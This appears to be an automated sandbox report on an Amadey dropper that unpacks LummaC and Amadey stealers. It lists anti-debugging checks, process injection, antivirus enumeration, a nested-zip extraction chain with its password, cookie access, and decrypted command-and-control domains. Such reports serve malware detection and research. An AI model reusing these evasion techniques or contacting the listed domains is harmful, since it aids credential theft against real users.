Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_05120D04 rdtsc

0_2_05120D04

Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe

Code function: 8_2_00335020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_00335020

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0088652B mov eax, dword ptr fs:[00000030h]	0_2_0088652B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0088A302 mov eax, dword ptr fs:[00000030h]	0_2_0088A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_009DA302 mov eax, dword ptr fs:[00000030h]	1_2_009DA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_009D652B mov eax, dword ptr fs:[00000030h]	1_2_009D652B
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 8_2_0035519E mov edi, dword ptr fs:[00000030h]	8_2_0035519E
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 8_2_00331614 mov edi, dword ptr fs:[00000030h]	8_2_00331614
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 10_2_00331614 mov edi, dword ptr fs:[00000030h]	10_2_00331614

Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe

Code function: 8_2_0033FE2C GetProcessHeap,

8_2_0033FE2C

Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 8_2_00335020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00335020
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 8_2_00335014 SetUnhandledExceptionFilter,	8_2_00335014
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 8_2_00334C64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00334C64
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 8_2_0033B4B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0033B4B9
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 10_2_00335020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00335020
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 10_2_00335014 SetUnhandledExceptionFilter,	10_2_00335014
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 10_2_00334C64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00334C64
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 10_2_0033B4B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_0033B4B9

Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe

Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 35f0a75b93.exe PID: 7748, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe

Code function: 8_2_0035519E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

8_2_0035519E

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe

Memory written: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rapeflowwj.lat
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: crosshuaht.lat
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: sustainskelet.lat
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: aspecteirs.lat
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: energyaffai.lat
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: necklacebudi.lat
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: discokeyus.lat
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: grannyejh.lat
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: pancakedipyps.click
Source: 5cda6c90d7.exe, 0000000C.00000002.2861737147.0000000000F71000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: cheapptaxysu.click
Source: 142c991362.exe, 00000023.00000003.3330595087.00000000055E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: sweepyribs.lat

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe "C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe "C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe "C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe "C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe "C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe "C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe "C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe "C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe "C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe "C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe "C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Process created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Process created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Process created: unknown unknown

Source: 5cda6c90d7.exe, 0000000C.00000002.2863553827.000000000113E000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: BProgram Manager
Source: 2e4e1b8516.exe, 0000002D.00000000.3476591551.00000000006A2000.00000002.00000001.01000000.0000001E.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: file.exe, file.exe, 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, skotes.exe, 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Program Manager

Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: EnumSystemLocalesW,	8_2_00343086
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: GetLocaleInfoW,	8_2_003430D1
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_00343178
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_00342A13
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: GetLocaleInfoW,	8_2_0033F21C
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: GetLocaleInfoW,	8_2_0034327E
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: EnumSystemLocalesW,	8_2_00342C64
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	8_2_00342CFF
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: EnumSystemLocalesW,	8_2_0033F717
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: EnumSystemLocalesW,	8_2_00342F52
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: GetLocaleInfoW,	8_2_00342FB1
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: EnumSystemLocalesW,	10_2_00343086
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: GetLocaleInfoW,	10_2_003430D1
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	10_2_00343178
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	10_2_00342A13
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: GetLocaleInfoW,	10_2_0033F21C
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: GetLocaleInfoW,	10_2_0034327E
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: EnumSystemLocalesW,	10_2_00342C64
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	10_2_00342CFF
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: EnumSystemLocalesW,	10_2_0033F717
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: EnumSystemLocalesW,	10_2_00342F52
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: GetLocaleInfoW,	10_2_00342FB1

Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019812001\54682ac64c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019812001\54682ac64c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019813001\cc6b47fc15.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1019813001\cc6b47fc15.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0086CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_0086CBEA

Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: procmon.exe
Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: wireshark.exe
Source: 5cda6c90d7.exe, 0000000C.00000003.2800638240.000000000182D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2860663337.0000000005E38000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2800310168.0000000005E38000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815144465.0000000005E38000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2801132226.00000000017D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 14.2.Gxtuum.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.7739517025.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.Gxtuum.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.Gxtuum.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.7739517025.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe, type: DROPPED

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 1.2.skotes.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: 2e4e1b8516.exe PID: 4904, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: cd2469328d.exe PID: 7820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5cda6c90d7.exe PID: 5040, type: MEMORYSTR
